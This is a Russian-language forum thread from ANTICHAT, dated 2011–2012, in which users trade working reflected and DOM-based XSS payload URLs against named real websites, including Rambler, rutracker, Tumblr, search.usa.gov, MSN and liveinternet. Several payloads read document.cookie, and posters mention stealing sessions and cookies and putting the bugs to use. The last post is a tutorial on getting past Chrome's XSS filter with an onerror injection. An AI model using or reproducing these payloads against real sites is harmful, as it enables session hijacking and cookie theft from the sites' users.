ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.11.2011, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
49
|
|
http://horoscopes.rambler.ru/psychology.html?id=1174592&sec=1174580">alert('XSS')
|
|
|
|

05.01.2012, 00:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 45485
Репутация:
1
|
|
Крупнейший русскоязычный битторрент трекер.
Код:
Code:
http://pm.rutracker.org/forum/privmsg.php?mode=post">alert(document.cookie)
|
|
|
|

05.01.2012, 02:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 45485
Репутация:
1
|
|
Рамблер.
Код:
Code:
http://horoscopes.rambler.ru/names.html?rubric=0&words=test">alert('xss')
Код:
Code:
http://help.rambler.ru/1/search/avia/?set=help&query=111">alert('xss')
Код:
Code:
http://planeta.rambler.ru/abuse.html?url=">alert('xss')
|
|
|
|

05.01.2012, 06:07
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от kravch_v
kravch_v said:
Google XSS!
Сообщение от kravch_v
kravch_v said:
Кибер, сессию и куки спереть реально.
Было бы интересно почитать, как это сделать. JS выполняется даже не на поддомене, а на googleusercontent.com. Кроме опен-редиректа и фишинга юзеров гугла не могу придумать варианты использования этого бага.
|
|
|

08.01.2012, 13:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Tumblr - сервис микроблоггинга тИЦ 3600 PR 8
Код HTML:
HTML:
https://www.tumblr.com/register/join_tumblr?referring_blog=usagov%22%3E%3Cscript%3Ealert()%3C/script%3E
P.S. Достаточно известный сервис, можно юзнуть
--
USA Government
тИЦ 350 PR 10
Код:
Code:
http://search.usa.gov/search/news?affiliate=usa.govblog&locale=en&m=false&query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&tbs=h
P.S. Тут есть ПП, поэтому может кому понадобится.
|
|
|
|

19.01.2012, 05:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
49
|
|
Ещё один msn.com
http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"/>
|
|
|
|

19.01.2012, 09:58
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от dev1k
dev1k said:
Ещё один msn.com
http://ringtones.nl.
msn.com
/games.php?rtch=1&rtlo=41992
"/>
Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает.
Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере.
Данные из реферера выводятся в двух местах:
Сообщение от None
d.writeln('window.open (bd+"/send/javagame?id="+nr+"&clx=1&rths=0&brpc=&rtlo=
41992\"/>
","sendpop","toolbar=no,location=no,directories=no ,status=yes,menubar=no,scrollbars=yes,resizable=no ,copyhistory=no,width=600,height=450,screenX=0,scr eenY=0,top=0,left=0");');
Сообщение от None
d.writeln('[/COLOR][/B]
">');
Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.
В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?
http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992">[/COLOR]
Без них все работает нормально:
[B]http://ringtones.nl.msn.com/games.php?rtlo=">
|
|
|

19.01.2012, 19:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 17229
Репутация:
31
|
|
liveinternet.ru
Код:
Code:
http://www.liveinternet.ru/tests.php?cmd=show&session_id=7f00c824a22d703516ea5e7e94fc4a1b&order=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Код:
Code:
http://www.liveinternet.ru/search/?q=">alert(document.cookie)
|
|
|
|

21.01.2012, 21:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
[CODE]
Code:
http://muziek.downloaden.nl.msn.com/artist.php?artist=2pac">alert(document.cookie)
|
|
|
|

22.01.2012, 18:07
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
P.S. Xss с mandriva пашет только в Opera+IE.
Продолжаем знакомство с XSS.
Тема урока - "почему в одном браузере работает, а в другом нет"
[B]http://store.mandriva.com/simple_popup_image.php?img= '>alert()alert(1[COLOR="Green"])= 8 тоже).
"alert()" вырезается фильтром и XSS не срабатывает. Чтобы это увидеть, можно в окне браузера нажать правую кнопку мыши и выбрать " Inspect element"
На странице код внедряется внутри тега img.
У этого тега есть события onload и onerror, поэтому нет смысла его закрывать и использовать тег script. Достаточно вставить такой код:
http://store.mandriva.com/simple_popup_image.php?img='+onerror=alert(1)+
Этот вариант работает в IE (до 8 версии), опере, фф, но все так же не работает в хроме. Фильтр вырезает " =alert(1)".
Попробуем сделать так:
http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/
Код "alert(1);/" содержит ошибку синтаксиса JS и не будет выполняться браузером, поэтому фильтровать его (казалось бы) необязательно. Но посмотрим внимательнее на ответ сервера:
Так как после onerror= нет открывающей кавычки, весь код до закрытия тега будет считаться значением onerror. Браузер этот код видит так:
"alert(1);/'/" уже не содержит ошибок синтаксиса и выполняется хромом в обход фильтра.
Окончательный вариант:
http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/
Не работает в IE >= 8
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|